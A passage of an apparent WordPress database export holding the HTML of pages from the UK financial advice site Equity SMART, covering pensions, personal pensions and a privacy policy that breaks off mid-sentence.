box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n	}\r\n	#imageframe-2.imageframe-dropshadow img{\r\n		-moz-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		-webkit-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n	}\r\n	]]></style><span id=\"imageframe-2\" class=\"imageframe imageframe-none\"><a href=\"../pensions/pension-release/\"/></span>&#13;\n<h2>Pension Release</h2>&#13;\n<p>If you’re aged over 55 and looking for clear, accurate, UNBIASED advice to access up to 25% of your pension fund. We will save you time, effort and expense through relevant, actionable advice you can depend on<a href=\"../pensions/pension-release/\">…find out more…</a></p>&#13;\n</div>&#13;\n<div class=\"one_third last\">&#13;\n<style type=\"text/css\"><![CDATA[\r\n	#imageframe-3.imageframe{float:left;}\r\n	#imageframe-3.imageframe img{border:0px solid #f6f6f6;}\r\n	#imageframe-3.imageframe-glow img{\r\n		-moz-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		-webkit-box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n		box-shadow: 0 0 3px rgba(0,0,0,.3); /* outer glow */\r\n	}\r\n	#imageframe-3.imageframe-dropshadow img{\r\n		-moz-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		-webkit-box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n		box-shadow: 2px 3px 7px rgba(0,0,0,.3); /* drop shadow */\r\n	}\r\n	]]></style><span id=\"imageframe-3\" class=\"imageframe imageframe-none\"><a href=\"../pensions/sipps/\"/></span>&#13;\n<h2>SIPP</h2>&#13;\n<p>Self Invested Personal Pensions (SIPP) are great for anyone who likes managing their own investments. We provide a range of market leading investment options through a range of over 4000 investment funds…find out more…</p>&#13;\n</div><div class=\"clearboth\"/>&#13;\n<style type=\"text/css\"><![CDATA[#reading-box-container-2 .tagline-shadow:before,#reading-box-container-2 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-2\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#f4f4f4 !important;border-width:1px;border-color:#fafafa!important;border-top-width:3px !important;border-top-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"\" class=\"continue button large default\">Contact Us Today</a><h2>It’s all so simple. To book a chat with our independent financial advisors.</h2><p>It\'s free, without obligation and impartial click the link or call free on .</p><a href=\"../contact-us/\" target=\"\" class=\"continue mobile-button button large default\">Contact Us Today</a></section></div>&#13;\n							</div>&#13;\n					</div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"/><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main-min.js\"/></body>','Pensions - Retirement Planning and UK Pension Advice','Whatever your income, everyone should take advantage of the current tax incentives on offer for pension planning. Get the best PENSIONS advice here.','publish','closed','closed','','pensions-retirement-planning-and-uk-pension-advice','','','2017-09-21 16:34:37','2017-09-21 16:34:37','',0,'http://www.equalitywalk.org.uk/pensions-retirement-planning-and-uk-pension-advice',0,'page','',0),(96,1,'2017-09-21 16:34:37','2017-09-21 16:34:37','<body class=\"page page-id-189 page-child parent-pageid-25 page-template-default header-full-width header-image content-sidebar\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n<div id=\"wrap\">&#13;\n<div id=\"header\"><div class=\"wrap\"><div id=\"title-area\"><p id=\"title\"><a href=\"http://www.equalitywalk.org.uk/\" title=\"Equity SMART\">Equity SMART Wealth Management</a></p></div><!-- end #title-area --></div><!-- end .wrap --></div><!--end #header--><div id=\"nav\"><div class=\"wrap\"><ul id=\"menu-main-nav\" class=\"menu menu-primary superfish\"><li id=\"menu-item-11\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-11\"><a title=\"Wealth Management home\" href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor menu-item-27\"><a href=\"/pensions\">Pensions</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-92\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-92\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n	<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\">SIPPS</a></li>&#13;\n	<li id=\"menu-item-105\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-105\"><a href=\"/pensions/stakeholder-pensions\">Stakeholder Pensions</a></li>&#13;\n	<li id=\"menu-item-127\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-127\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n	<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\">Group Pension Plan</a></li>&#13;\n	<li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a></li>&#13;\n	<li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\">Income Drawdown</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-47\"><a href=\"/investments\">Investments</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\">ISAs</a></li>&#13;\n	<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\">Lump Sum Investment</a></li>&#13;\n	<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\">Offshore Bonds</a></li>&#13;\n	<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\">Unit Trusts &amp; OEICs</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-46\"><a href=\"/trusts\">Trusts</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection\">Asset Protection</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Schemes</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-45\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-45\"><a href=\"/insurance-protection\">Insurance Protection</a></li>&#13;\n<li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n<li id=\"menu-item-43\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-43\"><a href=\"/about-us\">About Us</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-149\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-149\"><a href=\"/about-us/testimonials\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-407\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-407\"><a href=\"/about-us/frequently-asked-questions\">Frequently Asked Questions</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-24\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-24\"><a href=\"/contact-us\">Contact Us</a></li>&#13;\n</ul></div><!-- end .wrap --></div><div id=\"inner\"><div class=\"wrap\">	<div id=\"content-sidebar-wrap\">&#13;\n				<div id=\"content\" class=\"hfeed\">&#13;\n			<div class=\"breadcrumb\">You are here: <a href=\"/\" title=\"View Wealth Management home\">Wealth Management home</a> / <a href=\"/pensions\" title=\"View Pensions\">Pensions</a> / Personal Pensions</div>	<div class=\"post-189 page type-page status-publish hentry\">&#13;\n&#13;\n				<h1 class=\"entry-title\">Personal Pensions</h1>&#13;\n		&#13;\n				<div class=\"entry-content\">&#13;\n			<p>You can take out a personal pension whether you’re employed or self-employed.</p>&#13;\n<p>You can also have a personal pension (including a <a title=\"Stakeholder Pensions\" href=\"/\" data-bitly-type=\"bitly_hover_card\">stakeholder pension</a>) if you’re unemployed.</p>&#13;\n<p>To take out a personal pension, you must be aged 18 to 75. You can also take out a stakeholder pension on behalf of a child.</p>&#13;\n<p>If you are an employee who is a member of an <a title=\"Occupational Pensions\" href=\"/2012/pensions/occupational-pensions\" data-bitly-type=\"bitly_hover_card\">occupational pension scheme</a>, you may be able to take out a personal pension as well. From April 2006, you can save as much you like into any number of pension schemes. This applies to both personal and occupational schemes. There is no upper limit to the total amount of pension savings that you can build up, although there are limits on the amount of tax relief you will get.</p>&#13;\n<p>A personal pension scheme will provide one or more of the following benefits:-</p>&#13;\n<ul><li>a pension during retirement, which can start at any age between 55 and 75</li>&#13;\n<li>a tax-free lump sum on retirement of up to 25% of the pension fund which has been built up from your contributions and interest and/or bonuses paid by the pension provider</li>&#13;\n<li>a pension payable to your widow, widower, civil partner or other dependant(s)</li>&#13;\n<li>a tax-free <a title=\"Lump Sum Investment\" href=\"/\" data-bitly-type=\"bitly_hover_card\">lump sum</a>, payable if you die before retirement, to your widow, widower, civil partner or other dependant(s).</li>&#13;\n</ul></div><!-- end .entry-content -->&#13;\n		&#13;\n	</div><!-- end .postclass -->&#13;\n			<div id=\"comments\">&#13;\n					</div><!--end #comments-->&#13;\n										<div id=\"respond\">&#13;\n				<h3 id=\"reply-title\">Ask a Question or Leave a Comment <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"/pensions/personal-pensions\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\">&#13;\n																										<p class=\"comment-form-author\"><input id=\"author\" name=\"author\" type=\"text\" value=\"\" size=\"30\" tabindex=\"1\" aria-required=\"true\" /><label for=\"author\">Name</label> <span class=\"required\">*</span></p><!-- #form-section-author .form-section -->&#13;\n<p class=\"comment-form-email\"><input id=\"email\" name=\"email\" type=\"text\" value=\"\" size=\"30\" tabindex=\"2\" aria-required=\"true\" /><label for=\"email\">Email</label> <span class=\"required\">*</span></p><!-- #form-section-email .form-section -->&#13;\n<p class=\"comment-form-url\"><input id=\"url\" name=\"url\" type=\"text\" value=\"\" size=\"30\" tabindex=\"3\" /><label for=\"url\">Website</label></p><!-- #form-section-url .form-section -->&#13;\n												<p class=\"comment-form-comment\"><textarea id=\"comment\" name=\"comment\" cols=\"45\" rows=\"8\" tabindex=\"4\" aria-required=\"true\"></textarea></p><!-- #form-section-comment .form-section -->												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"submit\" value=\"Post Comment\" /><input type=\"hidden\" name=\"comment_post_ID\" value=\"189\" id=\"comment_post_ID\" /></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"379cadcc8b\" /></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n								</div><!-- end #content -->&#13;\n		<div id=\"sidebar\" class=\"sidebar widget-area\">&#13;\n<div id=\"text-3\" class=\"widget widget_text\"><div class=\"widget-wrap\">			<div class=\"textwidget\"><!-- AddThis Button BEGIN -->&#13;\n<div class=\"addthis_toolbox addthis_default_style addthis_32x32_style\">&#13;\n<a class=\"addthis_button_linkedin\"></a>&#13;\n<a class=\"addthis_button_twitter\"></a>&#13;\n<a class=\"addthis_button_facebook\"></a>&#13;\n<a class=\"addthis_button_compact\"></a>&#13;\n<a class=\"addthis_counter addthis_bubble_style\"></a>&#13;\n</div>&#13;\n&#13;\n<!-- AddThis Button END --></div>&#13;\n		</div></div>&#13;\n<div id=\"text-2\" class=\"widget widget_text\"><div class=\"widget-wrap\">			<div class=\"textwidget\"><div id=\"sidebar-contact-form\"><div class=\"wpcf7\" id=\"wpcf7-f447-w1-o1\"><form action=\"../../pensions/personal-pensions/\" method=\"post\" class=\"wpcf7-form\">&#13;\n<div style=\"display: none;\">&#13;\n<input type=\"hidden\" name=\"_wpcf7\" value=\"447\" /><input type=\"hidden\" name=\"_wpcf7_version\" value=\"3.2\" /><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f447-w1-o1\" /><input type=\"hidden\" name=\"_wpnonce\" value=\"fd287ba6f5\" /></div>&#13;\n<p>Your Name (required)<br /><span class=\"wpcf7-form-control-wrap your-name\"><input type=\"text\" name=\"your-name\" value=\"\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required\" size=\"40\" /></span> </p>&#13;\n<p>Your Email (required)<br /><span class=\"wpcf7-form-control-wrap your-email\"><input type=\"text\" name=\"your-email\" value=\"\" class=\"wpcf7-form-control wpcf7-text wpcf7-email wpcf7-validates-as-required wpcf7-validates-as-email\" size=\"40\" /></span> </p>&#13;\n<p>Your Message<br /><span class=\"wpcf7-form-control-wrap your-message\"><textarea name=\"your-message\" class=\"wpcf7-form-control  wpcf7-textarea\" cols=\"40\" rows=\"10\"></textarea></span> </p>&#13;\n<div class=\"side-contact-submit\"><input type=\"submit\" value=\"Send Your Message\" class=\"wpcf7-form-control  wpcf7-submit\" /></div>&#13;\n<div class=\"wpcf7-response-output wpcf7-display-none\"></div></form></div></div></div>&#13;\n		</div></div>&#13;\n<div id=\"text-4\" class=\"widget widget_text\"><div class=\"widget-wrap\">			<div class=\"textwidget\"><div class=\"tel\">Or call us on <em></em></div></div>&#13;\n		</div></div>&#13;\n</div>&#13;\n	</div><!-- end #content-sidebar-wrap -->&#13;\n	<div class=\"after_content_sidebar_wrap\"><div id=\"text-5\" class=\"widget widget_text\"><div class=\"widget-wrap\">			<div class=\"textwidget\"><div class=\"preferred-providers\">A few of our preferred providers</div></div>&#13;\n		</div></div>&#13;\n</div><!-- end .after_content_sidebar_wrap --></div><!-- end .wrap --></div><!-- end #inner --><div id=\"footer\" class=\"footer\"><div class=\"wrap\"><div id=\"footer-nav\">&#13;\n<ul><li><a href=\"/\">Wealth Management</a></li>&#13;\n<li><a href=\"/about-us/frequently-asked-questions\">FAQs</a></li>&#13;\n<li><a href=\"/about-us/testimonials\">Testimonials</a></li>&#13;\n<li><a href=\"/privacy-policy\">Privacy Policy</a></li>&#13;\n<li><a href=\"/wealth-management-glossary\">Glossary of Wealth Management Terms</a></li>&#13;\n<li><a href=\"/site-map\">Site map</a></li>&#13;\n<li><a href=\"https://rsr.wrapadviser.co.uk/\">Login</a></li>&#13;\n</ul></div>&#13;\n<p> </p>&#13;\n<div class=\"creds\"><p>© Copyright  2017 Equity SMART</p></div></div><!-- end .wrap --></div><!-- end #footer -->&#13;\n</div><!-- end #wrap -->&#13;\n<script type=\"text/javascript\"><![CDATA[jQuery(document).ready(function($) {$(\".myController\").jFlow({controller: \".jFlowControl\",slideWrapper : \"#jFlowSlider\",slides: \"#slides\",selectedWrapper: \"jFlowSelected\",width: \"870px\",height: \"400px\",timer: 6000,duration: 1000,loop: 1,effect: \"right\",prev: \".slider-previous\",next: \".slider-next\",auto: true});});]]></script><script type=\"text/javascript\"><![CDATA[\r\n\r\nvar addthis_config = {\"data_track_clickback\":false,\"data_track_addressbar\":false,\"data_track_textcopy\":false};\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/q-and-a/js/qa.js\"></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/jquery.form.js\"></script><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"></script><script type=\"text/javascript\" src=\"/wp-content/themes/genesis/lib/js/menu/superfish.js\"></script><script type=\"text/javascript\" src=\"/wp-content/themes/genesis/lib/js/menu/superfish.args.js\"></script><script type=\"text/javascript\" src=\"/wp-content/plugins/genesis-slider/js/jflow.plus.js\"></script><!--wp_footer--></body>','Personal Pensions','','publish','closed','closed','','personal-pensions','','','2017-09-21 16:34:37','2017-09-21 16:34:37','',0,'http://www.equalitywalk.org.uk/personal-pensions',0,'page','',0),(97,1,'2017-09-21 16:34:37','2017-09-21 16:34:37','<body class=\"page page-id-163 page-template-default light  wpb-js-composer js-comp-ver-3.5.4 vc_responsive\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n					<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v2\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-4811\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-4811\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-5319\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-5319\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-6369\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6369\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-6489\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6489\"><a href=\"../resources/\">Resources</a></li>&#13;\n<li id=\"menu-item-5417\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-5417\"><a href=\"../our-blog/\">Blog</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-ancestor current-menu-parent current_page_parent current_page_ancestor menu-item-has-children menu-item-4746\"><a href=\"../contact-us/\">Contact</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-6358\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6358\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-6359\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-menu-item page_item page-item-163 current_page_item menu-item-6359\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-6357\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6357\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n			</ul></div>			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"/></div>		</div>&#13;\n				<div id=\"sliders-container\">&#13;\n									</div>&#13;\n					<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Privacy Policy										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li>Privacy Policy</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n													<div id=\"main\" class=\"\" style=\"overflow:hidden !important;\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n					<div id=\"content\" style=\"float:left;\">&#13;\n				<div id=\"post-163\" class=\"post-163 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Privacy Policy</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n						<div class=\"post-content\">&#13;\n				<p>In order to advise you properly, INvestoomust obtain certain information from you about your financial and personal circumstances. By providing us with your personal data:</p>&#13;\n<ol><li>You agree that the information we hold about you can be held on computer and/or paper files.</li>&#13;\n<li>You agree that any information which you give us, including sensitive personal data such as health and medical records, may be disclosed to appropriate third parties for the purpose of processing your application and for the ongoing administration of your investment or policy but for no other purpose.</li>&#13;\n</ol><p>Please note: All information sent to us via the enquiry forms is held with the strictest confidence.</p>&#13;\n<p> </p>&#13;\n<p>This privacy policy sets out how Equity SMART uses and protects any information that you give Equity SMART when you use this website. Equity SMART Services is committed to ensuring that your privacy is protected. Should we ask you to provide certain information by which you can be identified when using this website, then you can be assured that it will only be used in accordance with this privacy statement. Equity SMART may change this policy from time to time by updating this page. You should check this page from time to time to ensure that you are happy with any changes.</p>&#13;\n<p>What we collect<br/>&#13;\nWe may collect the following information:</p>&#13;\n<ul><li>name and job title</li>&#13;\n<li>contact information including email address</li>&#13;\n<li>demographic information such as postcode, preferences and interests</li>&#13;\n<li>other information relevant to customer surveys and/or offers</li>&#13;\n</ul><p>What we do with the information we gather<br/>&#13;\nWe require this information to understand your needs and provide you with a better service, and in particular for the following reasons:</p>&#13;\n<ul><li>Internal record keeping.</li>&#13;\n<li>We may use the information to improve our products and services.</li>&#13;\n<li>We may periodically send promotional emails about new products, special offers or other information which we think you may find interesting using the email address which you have provided.</li>&#13;\n<li>From time to time, we may also use your information to contact you for market research purposes. We may contact you by email, phone, fax or mail. We may use the information to customise the website according to your interests.</li>&#13;\n</ul><p>Security<br/>&#13;\nWe are committed to ensuring that your information is secure. In order to prevent unauthorised access or disclosure we have put in place suitable physical, electronic and managerial procedures to safeguard and secure the information we collect online.</p>&#13;\n<p>How we use cookies<br/>&#13;\nA cookie is a small file which asks permission to be placed on your computer’s hard drive. By using this website you agree to our use of cookies. To find out how you can control cookies further please <a href=\"../cookies/\">click here</a>.</p>&#13;\n<p>Links to other websites<br/>&#13;\nOur website may contain links to other websites of interest. However, once you have used these links to leave our site, you should note that we do not have any control over that other website. Therefore, we cannot be responsible for the protection and privacy of any information which you provide whilst visiting such sites and such sites are not governed by this privacy statement. You should exercise caution and look at the privacy statement applicable to the website in question.</p>&#13;\n<p>Controlling your personal information<br/>&#13;\nYou may choose to restrict the collection or use of your personal information in the following ways:</p>&#13;\n<ul><li>whenever you are asked to fill in a form on the website, look for the box that you can click to indicate that you do not want the information to be used by anybody for direct marketing purposes</li>&#13;\n<li>if you have previously agreed to us using your personal information for direct marketing purposes, you may change your mind at any time by <b>writing to us.</b></li>&#13;\n</ul><p>We will not sell, distribute or lease your personal information to third parties unless we have your permission or are required by law to do 